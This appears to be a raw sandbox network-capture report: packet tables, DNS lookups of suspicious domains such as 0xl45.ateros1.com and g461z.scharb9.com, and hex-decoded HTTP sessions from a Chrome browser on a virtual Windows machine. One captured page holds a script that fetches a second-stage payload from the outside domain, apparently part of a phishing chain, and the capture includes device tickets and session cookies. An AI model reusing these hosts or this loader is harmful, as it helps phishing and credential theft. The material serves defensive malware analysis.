                  Mar 7, 2024 19:14:00.460757017 CET4434973620.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:15.174048901 CET49740443192.168.2.6142.250.101.104
                  Mar 7, 2024 19:14:15.174113035 CET44349740142.250.101.104192.168.2.6
                  Mar 7, 2024 19:14:15.174205065 CET49740443192.168.2.6142.250.101.104
                  Mar 7, 2024 19:14:15.175287962 CET49740443192.168.2.6142.250.101.104
                  Mar 7, 2024 19:14:15.175318956 CET44349740142.250.101.104192.168.2.6
                  Mar 7, 2024 19:14:15.535749912 CET44349740142.250.101.104192.168.2.6
                  Mar 7, 2024 19:14:15.536150932 CET49740443192.168.2.6142.250.101.104
                  Mar 7, 2024 19:14:15.536185026 CET44349740142.250.101.104192.168.2.6
                  Mar 7, 2024 19:14:15.536560059 CET44349740142.250.101.104192.168.2.6
                  Mar 7, 2024 19:14:15.538009882 CET49740443192.168.2.6142.250.101.104
                  Mar 7, 2024 19:14:15.538110971 CET44349740142.250.101.104192.168.2.6
                  Mar 7, 2024 19:14:15.589950085 CET49740443192.168.2.6142.250.101.104
                  Mar 7, 2024 19:14:16.607331991 CET49741443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:16.607374907 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:16.607456923 CET49741443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:16.608670950 CET49741443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:16.608684063 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:16.956439972 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:16.996212959 CET49741443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.040110111 CET49741443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.040127039 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.040749073 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.041470051 CET49741443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.041546106 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.041624069 CET49741443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.088238955 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.350311995 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.350420952 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.350526094 CET49741443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.350653887 CET49741443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.350670099 CET4434974135.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.351528883 CET49742443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.351557970 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.351707935 CET49742443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.351943970 CET49742443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.351957083 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.700814009 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.701297998 CET49742443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.701313972 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.701678038 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.702106953 CET49742443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.702167988 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:17.702342033 CET49742443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:17.744232893 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:18.094188929 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:18.094273090 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:18.094327927 CET49742443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:18.094594955 CET49742443192.168.2.635.190.80.1
                  Mar 7, 2024 19:14:18.094619989 CET4434974235.190.80.1192.168.2.6
                  Mar 7, 2024 19:14:25.556962013 CET44349740142.250.101.104192.168.2.6
                  Mar 7, 2024 19:14:25.557027102 CET44349740142.250.101.104192.168.2.6
                  Mar 7, 2024 19:14:25.557097912 CET49740443192.168.2.6142.250.101.104
                  Mar 7, 2024 19:14:26.091092110 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.091125965 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:26.091213942 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.092725992 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.092737913 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:26.761837006 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:26.762007952 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.763854027 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.763863087 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:26.764642000 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:26.766516924 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.766578913 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.766585112 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:26.766794920 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.812237024 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:26.987351894 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:26.987445116 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:26.988245964 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.988603115 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.988603115 CET49743443192.168.2.620.7.2.167
                  Mar 7, 2024 19:14:26.988617897 CET4434974320.7.2.167192.168.2.6
                  Mar 7, 2024 19:14:27.452384949 CET49740443192.168.2.6142.250.101.104
                  Mar 7, 2024 19:14:27.452425003 CET44349740142.250.101.104192.168.2.6
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 7, 2024 19:13:13.109596014 CET53614321.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:13.271527052 CET53552721.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:14.265122890 CET53643761.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:14.680135012 CET5921353192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:14.680135012 CET6004053192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:14.876873016 CET53592131.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:14.877279043 CET53600401.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:15.122173071 CET5353853192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:15.122636080 CET5543453192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:15.276751995 CET53535381.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:15.277049065 CET53554341.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:15.896359921 CET6455953192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:15.896617889 CET6547553192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:16.070696115 CET53645591.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:16.070884943 CET53654751.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:16.605505943 CET6494453192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:16.606245041 CET5679453192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:16.760727882 CET53649441.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:16.761890888 CET53567941.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:17.340693951 CET5639053192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:17.342118025 CET5158853192.168.2.61.1.1.1
                  Mar 7, 2024 19:13:17.497559071 CET53563901.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:17.497946978 CET53515881.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:31.263179064 CET53530481.1.1.1192.168.2.6
                  Mar 7, 2024 19:13:50.294261932 CET53500561.1.1.1192.168.2.6
                  Mar 7, 2024 19:14:12.511075020 CET53538481.1.1.1192.168.2.6
                  Mar 7, 2024 19:14:13.271436930 CET53603511.1.1.1192.168.2.6
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 7, 2024 19:13:14.680135012 CET192.168.2.61.1.1.10xc1aaStandard query (0)0xl45.ateros1.comA (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:14.680135012 CET192.168.2.61.1.1.10x3f4Standard query (0)0xl45.ateros1.com65IN (0x0001)false
                  Mar 7, 2024 19:13:15.122173071 CET192.168.2.61.1.1.10x50bdStandard query (0)www.google.comA (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:15.122636080 CET192.168.2.61.1.1.10xd8eeStandard query (0)www.google.com65IN (0x0001)false
                  Mar 7, 2024 19:13:15.896359921 CET192.168.2.61.1.1.10xf09Standard query (0)g461z.scharb9.comA (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:15.896617889 CET192.168.2.61.1.1.10x3104Standard query (0)g461z.scharb9.com65IN (0x0001)false
                  Mar 7, 2024 19:13:16.605505943 CET192.168.2.61.1.1.10x8dc3Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:16.606245041 CET192.168.2.61.1.1.10x8f21Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                  Mar 7, 2024 19:13:17.340693951 CET192.168.2.61.1.1.10x709fStandard query (0)g461z.scharb9.comA (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:17.342118025 CET192.168.2.61.1.1.10xd212Standard query (0)g461z.scharb9.com65IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 7, 2024 19:13:14.876873016 CET1.1.1.1192.168.2.60xc1aaNo error (0)0xl45.ateros1.com104.21.24.112A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:14.876873016 CET1.1.1.1192.168.2.60xc1aaNo error (0)0xl45.ateros1.com172.67.218.90A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:14.877279043 CET1.1.1.1192.168.2.60x3f4No error (0)0xl45.ateros1.com65IN (0x0001)false
                  Mar 7, 2024 19:13:15.276751995 CET1.1.1.1192.168.2.60x50bdNo error (0)www.google.com142.250.101.104A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:15.276751995 CET1.1.1.1192.168.2.60x50bdNo error (0)www.google.com142.250.101.147A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:15.276751995 CET1.1.1.1192.168.2.60x50bdNo error (0)www.google.com142.250.101.99A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:15.276751995 CET1.1.1.1192.168.2.60x50bdNo error (0)www.google.com142.250.101.106A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:15.276751995 CET1.1.1.1192.168.2.60x50bdNo error (0)www.google.com142.250.101.103A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:15.276751995 CET1.1.1.1192.168.2.60x50bdNo error (0)www.google.com142.250.101.105A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:15.277049065 CET1.1.1.1192.168.2.60xd8eeNo error (0)www.google.com65IN (0x0001)false
                  Mar 7, 2024 19:13:16.070696115 CET1.1.1.1192.168.2.60xf09No error (0)g461z.scharb9.com104.21.14.17A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:16.070696115 CET1.1.1.1192.168.2.60xf09No error (0)g461z.scharb9.com172.67.133.193A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:16.070884943 CET1.1.1.1192.168.2.60x3104No error (0)g461z.scharb9.com65IN (0x0001)false
                  Mar 7, 2024 19:13:16.760727882 CET1.1.1.1192.168.2.60x8dc3No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:17.497559071 CET1.1.1.1192.168.2.60x709fNo error (0)g461z.scharb9.com104.21.14.17A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:17.497559071 CET1.1.1.1192.168.2.60x709fNo error (0)g461z.scharb9.com172.67.133.193A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:17.497946978 CET1.1.1.1192.168.2.60xd212No error (0)g461z.scharb9.com65IN (0x0001)false
                  Mar 7, 2024 19:13:28.339660883 CET1.1.1.1192.168.2.60x8039No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                  Mar 7, 2024 19:13:28.339660883 CET1.1.1.1192.168.2.60x8039No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                  Mar 7, 2024 19:13:41.855375051 CET1.1.1.1192.168.2.60x8a21No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                  Mar 7, 2024 19:13:41.855375051 CET1.1.1.1192.168.2.60x8a21No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                  • 0xl45.ateros1.com
                  • https:
                    • g461z.scharb9.com
                  • a.nel.cloudflare.com
                  • fs.microsoft.com
                  Session IDSource IPSource PortDestination IPDestination Port
                  0192.168.2.64971620.10.31.115443
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:14 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 54 71 45 72 42 48 64 61 6b 4f 64 7a 6c 39 61 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 63 33 33 39 37 39 62 61 34 65 37 36 61 61 62 0d 0a 0d 0a
                  Data Ascii: CNT 1 CON 305MS-CV: bTqErBHdakOdzl9a.1Context: cc33979ba4e76aab
                  2024-03-07 18:13:14 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                  2024-03-07 18:13:14 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 62 54 71 45 72 42 48 64 61 6b 4f 64 7a 6c 39 61 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 63 33 33 39 37 39 62 61 34 65 37 36 61 61 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 49 33 72 34 38 50 7a 2b 64 36 32 4d 44 62 6a 62 39 6d 49 4e 2b 4b 6e 71 69 4d 41 46 78 59 55 37 73 50 70 38 4f 76 58 6a 52 4d 65 67 46 53 48 48 38 2f 57 48 35 6f 51 76 6b 4c 4f 38 51 6f 7a 53 6e 4b 37 41 34 2b 4f 52 33 31 43 37 42 42 51 7a 45 72 64 73 76 4f 4f 46 62 73 55 67 67 35 54 6e 52 41 47 76 6a 44 42 36 73 63 6d 43
                  Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: bTqErBHdakOdzl9a.2Context: cc33979ba4e76aab<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
                  2024-03-07 18:13:14 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 54 71 45 72 42 48 64 61 6b 4f 64 7a 6c 39 61 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 63 33 33 39 37 39 62 61 34 65 37 36 61 61 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: bTqErBHdakOdzl9a.3Context: cc33979ba4e76aab<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:13:14 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:13:14 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 6c 4c 38 63 4f 41 32 42 55 6d 6d 70 64 6e 41 72 75 51 54 79 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                  Data Ascii: MS-CV: jlL8cOA2BUmmpdnAruQTyg.0Payload parsing failed.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.649719104.21.24.1124434176C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:13:15 UTC673OUTGET /OpLz16A1v5Gc/ HTTP/1.1
                  Host: 0xl45.ateros1.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  sec-ch-ua-platform: "Windows"
                  Upgrade-Insecure-Requests: 1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Sec-Fetch-Site: none
                  Sec-Fetch-Mode: navigate
                  Sec-Fetch-User: ?1
                  Sec-Fetch-Dest: document
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:15 UTC1118INHTTP/1.1 200 OK
                  Date: Thu, 07 Mar 2024 18:13:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: no-cache, private
                  Vary: Accept-Encoding
                  Access-Control-Allow-Origin: *
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 1; mode=block
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bil8UMMBybAvBQF1sRkQEUiRcyQkVW3U2optV3xBm4ZFHTL6fr1kA3bF12PuwM3ByKJ39h%2BI5Q%2Bi4rUthK6leCPzQ9BAZB7d4S41wbtvfyuChSH82W6L3dnR1gVM"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  alt-svc: h3=":443"; ma=86400
                  Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; expires=Thu, 07-Mar-2024 20:13:15 GMT; Max-Age=7200; path=/; secure; samesite=none
                  2024-03-07 18:13:15 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 69 39 51 61 48 64 6e 56 54 68 4a 61 6e 64 51 64 6c 4e 71 4c 32 31 47 54 30 4e 46 5a 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 79 74 44 55 31 46 4f 4d 55 68 4b 51 57 39 79 65 6d 67 78 5a 6c 42 52 51 6b 52 30 51 6a 56 30 53 56 5a 46 64 6b 46 45 65 54 46 30 63 6d 31 69 55 7a 52 70 54 6d 4a 53 4b 30 34 72 65 44 64 68 4e 55 38 32 53 44 55 79 65 57 52 61 64 6a 5a 69 61 47 52 35 4d 6a 52 4d 65 6c 5a 6f 62 6a 52 73 57 45 4a 32 59 6c 70 42 61 55 78 61 61 6e 5a 78 4e 55 6c 33 4e 57 64 77 52 31 4a 69 64 57 39 48 61 44 41 30 4d 30 35 6c 59 6d 5a 31 59 58 6c 43 65 46 46 50 4d 47 6c 75 56 56 5a 30 54 47 4a 45 4e 57 70 35 52 30 51 33 59 32 30
                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20
                  2024-03-07 18:13:15 UTC1369INData Raw: 31 39 61 30 0d 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 65 74 63 68 28 27 68 74 74 70 73 3a 2f 2f 67 34 36 31 7a 2e 73 63 68 61 72 62 39 2e 63 6f 6d 2f 7a 77 63 6d 67 68 49 45 44 45 4d 72 56 76 45 56 43 4a 52 53 77 5a 70 4b 69 70 70 65 50 5a 45 46 42 53 50 53 5a 4b 44 55 52 51 59 47 46 56 57 54 4a 50 4b 4d 50 58 4f 59 5a 47 49 54 48 4f 51 56 50 49 5a 43 43 54 5a 52 5a 48 4b 47 57 47 5a 57 4a 53 59 4c 53 58 4f 27 2c 20 7b 0d 0a 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0d 0a 7d 29 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 28 29 0d 0a 7d 29 2e 74 68 65 6e 28
                  Data Ascii: 19a0<style>body { margin: 0;}</style><script>fetch('https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO', {method: "GET",}).then(response => {return response.text()}).then(
                  2024-03-07 18:13:15 UTC1369INData Raw: 65 57 45 69 4c 43 4a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 54 6d 56 33 49 46 52 68 61 53 42 4d 64 57 55 69 4c 43 4a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 55 47 68 68 5a 33 4e 51 59 53 49 73 49 6b 31 70 59 33 4a 76 63 32 39 6d 64 43 42 55 59 57 6b 67 54 47 55 69 4c 43 4a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 57 57 6b 67 51 6d 46 70 64 47 6b 69 4c 43 4a 4e 62 32 35 6e 62 32 78 70 59 57 34 67 51 6d 46 70 64 47 6b 69 4c 43 4a 4e 56 69 42 43 62 32 78 70 49 69 77 69 54 58 6c 68 62 6d 31 68 63 69 42 55 5a 58 68 30 49 69 77 69 51 32 46 74 59 6e 4a 70 59 53 42 4e 59 58 52 6f 49 6a 73 4e 43 6e 30 4e 43 6d 4a 76 5a 48 6b 67 65 77 30 4b 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 77 30 4b 49 43 42 6f 5a 57 6c
                  Data Ascii: eWEiLCJNaWNyb3NvZnQgTmV3IFRhaSBMdWUiLCJNaWNyb3NvZnQgUGhhZ3NQYSIsIk1pY3Jvc29mdCBUYWkgTGUiLCJNaWNyb3NvZnQgWWkgQmFpdGkiLCJNb25nb2xpYW4gQmFpdGkiLCJNViBCb2xpIiwiTXlhbm1hciBUZXh0IiwiQ2FtYnJpYSBNYXRoIjsNCn0NCmJvZHkgew0KICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICBoZWl
                  2024-03-07 18:13:15 UTC1369INData Raw: 43 31 6a 5a 57 35 30 5a 58 49 67 65 33 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 69 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 51 47 31 6c 5a 47 6c 68 49 43 68 74 61 57 34 74 64 32 6c 6b 64 47 67 36 4f 54 6b 79 63 48 67 70 65 77 30 4b 49 31 68 70 62 55 52 47 59 33 42 34 53 47 51 67 4c 6d 4e 76 62 43 31 73 5a 79 30 30 65 32 5a 73 5a 58 67 36 4d 43 41 77 49 47 46 31 64 47 38 37 64 32 6c 6b 64 47 67 36 4d 7a 4d 75 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 6c 4f 33 30 4e 43 6e 30 4e 43 69 4e 59 61 57 31 45 52 6d 4e 77 65 45 68 6b 49 43 35 6b 61 58 4e 77 62 47 46 35 4c 54 51 67 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 53 34 79 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 31 68 70 62 55 52 47
                  Data Ascii: C1jZW50ZXIge3RleHQtYWxpZ246IGNlbnRlciFpbXBvcnRhbnQ7fQ0KQG1lZGlhIChtaW4td2lkdGg6OTkycHgpew0KI1hpbURGY3B4SGQgLmNvbC1sZy00e2ZsZXg6MCAwIGF1dG87d2lkdGg6MzMuMzMzMzMzMzMlO30NCn0NCiNYaW1ERmNweEhkIC5kaXNwbGF5LTQge2ZvbnQtc2l6ZTogMS4yNXJlbSFpbXBvcnRhbnQ7fQ0KI1hpbURG
